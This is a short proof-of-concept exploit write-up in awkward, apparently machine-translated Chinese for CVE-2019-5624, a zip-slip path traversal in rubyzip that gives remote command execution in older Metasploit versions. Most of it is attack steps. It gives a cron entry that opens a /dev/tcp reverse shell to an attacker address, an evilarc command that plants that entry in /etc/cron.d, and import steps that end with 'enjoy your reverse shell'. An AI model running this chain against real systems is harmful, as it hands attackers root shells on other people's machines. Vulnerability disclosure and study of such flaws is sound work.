Metasploit RCE CVE-2019-5624

CVE - 5624 - 2019

概念证明的 metasploit 的漏洞 CVE - 2019 - 5624 (RCE) 处理不安全的 zip rubyzip

Intro

在 2019 年 2 月我发现新漏洞在 rubyzip 图书馆。它允许攻击者利用不安全的 zip (处理滑动拉链) 导致远程命令执行。

此漏洞被利用到所有目标 metasploit < 5.0 版本. 18metasploit 总结

PoC

• 创建文件的下列内容 ：

* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"

• 生成 ZIP 档案路径遍历净荷 ：

python evilarc.py exploit --os unix -p etc/cron.d/

• 请添加一个有效的 ZIP 文件到工作区 MSF (MSF 为提取它 ， 否则它将拒绝处理 zip 存档)
• 设置两个接收器 ， 一个端口与其它端口 4444 上的一个端口 (4445 4445 会反向壳)
• MSF 在登录 Web 接口
• 创建一个新的 “项目”
• 选择 “导入” 、 “来自文件” ， 选择了与邪恶的 ZIP 文件 ， 最后点击 “导入” 按钮
• 等待导入进程完成
• 享受你的反向壳

开源地址：https://github.com/VoidSec/CVE-2019-5624/